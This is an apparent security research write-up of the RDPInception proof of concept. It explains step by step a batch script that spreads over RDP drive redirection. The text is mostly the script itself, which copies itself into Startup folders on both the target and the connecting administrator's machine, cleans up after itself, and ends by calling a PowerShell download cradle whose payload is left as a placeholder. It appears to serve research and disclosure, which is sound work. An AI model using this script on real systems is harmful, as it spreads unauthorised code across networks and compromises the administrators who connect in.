Remote Desktop is often used by Systems Administrators to remotely manage machines. In a lot of organisations this could mean that a machine is placed in a DMZ or segregated part of the network that should not require any TCP port access other than TCP 3389 into the network segment.
The proof of concept for RDPInception is a relatively simple batch script, the details of which we will walk through below:
Switches off echo.
@echo off
Puts a short timer to ensure that tsclient is mounted.
timeout 1 >nul 2>&1
Makes a temp directory on both the visiting machine and the target.
mkdir \\tsclient\c\temp >nul 2>&1
mkdir C:\temp >nul 2>&1
Copies this file into the directories.
copy run.bat C:\temp >nul 2>&1
copy run.bat \\tsclient\c\temp >nul 2>&1
Ensure a text file does not exist in %TEMP%
del /q %TEMP%\temp_00.txt >nul 2>&1
Scans for startup directories on both the visiting machine and the target.
set dirs=dir /a:d /b /s C:\users\*Startup*
set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup*
echo|%dirs%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”
echo|%dirs2%|findstr /i “Microsoft\Windows\Start Menu\Programs\Startup”>>”%TEMP%\temp_00.txt”
Runs through each path and attempts to propagate the file to it.
for /F “tokens=*” %%a in (%TEMP%\temp_00.txt) DO (
copy run.bat “%%a” >nul 2>&1
copy C:\temp\run.bat “%%a” >nul 2>&1
copy \\tsclient\c\temp\run.bat “%%a” >nul 2>&1
)
Cleans up %TEMP% file
del /q %TEMP%\temp_00.txt >nul 2>&1
Execute the PowerShell download cradle.
powershell.exe <cradle here>